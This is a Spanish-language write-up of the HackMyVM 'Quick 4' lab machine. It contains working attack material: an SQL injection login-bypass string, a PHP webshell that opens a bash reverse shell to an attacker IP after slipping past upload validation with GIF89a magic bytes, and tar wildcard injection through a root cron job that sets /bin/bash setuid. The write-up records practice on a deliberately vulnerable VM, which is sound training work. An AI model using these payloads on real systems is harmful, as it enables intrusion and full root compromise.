cd ~/blog

~/writeups/hmv/108-quick-4.md

108 - Quick 4

easy Linux hmv 19-06-2024
SQL Injection (auth bypass)File upload (GIF89a magic bytes bypass)Tar Wildcard Injection (cron)
hackmyvm.eu/machines/machine.php?vm=Quick4

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.9
 nmap -sCV -p 22,80 -oN 02-targeted.txt 192.168.1.9
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-19 23:50 -04
Nmap scan report for 192.168.1.9
Host is up (0.00031s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Quick Automative - Home
| http-robots.txt: 1 disallowed entry
|_/admin/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Tras registrar una cuenta en /customer obtenemos un listado de correos. En /employee hay un login vulnerable a SQL Injection de bypass:

user: admin@admin.com
passwd: admin' or 1=1-- -

Dentro, en Users/Employees/Upload photo, subimos una webshell PHP interceptando con Burp y anteponiendo los magic bytes GIF89a para sortear la validación:

 cat pwned.php
<?php
    shell_exec("bash -c 'bash -i >& /dev/tcp/192.168.1.5/1234 0>&1'");
?>

Cambiamos la foto del usuario y, al cargarse, obtenemos la shell:

 ncat -nlvp 1234
Ncat: Connection from 192.168.1.9:53910.
bash: cannot set terminal process group (740): Inappropriate ioctl for device
bash: no job control in this shell
www-data@quick4:/var/www/html/employee/uploads$

Obtenemos la primera flag. Revisamos las tareas cron:

www-data@quick4:/tmp$ cat /etc/crontab
...
*/1 *	* * *   root    /usr/local/bin/backup.sh
...

www-data@quick4:/tmp$ cat /usr/local/bin/backup.sh
#!/bin/bash
cd /var/www/html/
tar czf /var/backups/backup-website.tar.gz *

El tar * es explotable con Tar Wildcard Injection:

www-data@quick4:/var/www/html$ echo "chmod u+s /bin/bash" > repwned.sh
www-data@quick4:/var/www/html$ chmod +x repwned.sh
www-data@quick4:/var/www/html$ touch /var/www/html/--checkpoint=1
www-data@quick4:/var/www/html$ touch /var/www/html/--checkpoint-action=exec=sh\ repwned.sh

www-data@quick4:/var/www/html$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1396520 Mar 14 11:31 /bin/bash

www-data@quick4:/var/www/html$ bash -p
bash-5.1# whoami
root

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados